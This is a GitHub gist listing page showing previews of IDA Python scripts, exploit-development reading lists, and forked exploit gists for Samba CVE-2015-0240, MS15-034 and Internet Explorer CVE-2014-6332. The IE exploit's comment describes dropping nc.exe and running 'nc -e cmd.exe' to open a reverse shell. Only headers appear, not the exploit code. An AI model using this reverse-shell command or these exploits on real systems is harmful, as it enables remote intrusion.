huyna
/ gist:41a8579ed9d86cf770f3
Created
February 26, 2016 03:44
— forked from bNull/gist:6003874
IDA Python script that will allow you to highlight a range of bytes and turn it into dwords (for manually fixing up tables or whatever).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # hotkey_utils.py - bNull | |
| # | |
| # Some useful shortcuts for binding to hotkeys. Current output/hotkeys: | |
| # | |
| # [+] Bound make_dwords to Ctrl-Alt-D | |
| # [+] Bound make_cstrings to Ctrl-Alt-A | |
| # [+] Bound make_offset to Ctrl-Alt-O | |
| import idaapi | |
| import idc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://drive.google.com/file/d/0B9Cw8k5__G16c05aeG81QjVRRlk/view?pref=2&pli=1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://securityintelligence.com/memgc-use-after-free-exploit-mitigation-in-edge-and-ie-on-windows-10/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SecurityIntelligence+%28Security+Intelligence%29 | |
| http://blogs.technet.com/b/srd/archive/2016/01/12/triaging-the-exploitability-of-ie-edge-crashes.aspx | |
| http://expdev-kiuhnm.rhcloud.com/2015/05/19/mona-2/ | |
| https://www.corelan.be/index.php/2014/08/16/analyzing-heap-objects-with-mona-py/ | |
| https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/ | |
| https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ |
huyna
/ Linux kernel exploit notes
Created
January 26, 2016 01:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ret2usr | |
| https://tc.gtisc.gatech.edu/bss/2014/r/ret2dir-slides.pdf | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1449130208829 |
huyna
/ cve-2015-0240_samba_exploit.py
Created
December 15, 2015 02:38
— forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
huyna
/ http_sys_pseudo.c
Created
December 15, 2015 02:37
— forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
| All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
| For anyone want to know what function are patched. | |
| Just open patched version and find all functions reference to RtlULongLongAdd(). | |
| */ | |
huyna
/ cve-2014-6332_exploit.html
Created
December 15, 2015 02:34
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 3B9DCDD69AC7615CD0E2941DC8E23DDF | |
| 5730866B34EF589BD398C9A9B6D7E307 | |
| 7D71593A7D159C754055E16C26B844112E7B4132 |
huyna
/ idapython_struct.py
Created
October 26, 2015 06:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #--------------------------------------------------------------------- | |
| # Structure test | |
| # | |
| # This script demonstrates how to create structures and populate them | |
| # with members of different types. | |
| # | |
| # Author: Gergely Erdelyi <gergely.erdelyi@d-dome.net> | |
| #--------------------------------------------------------------------- | |
| from idaapi import stroffflag, offflag |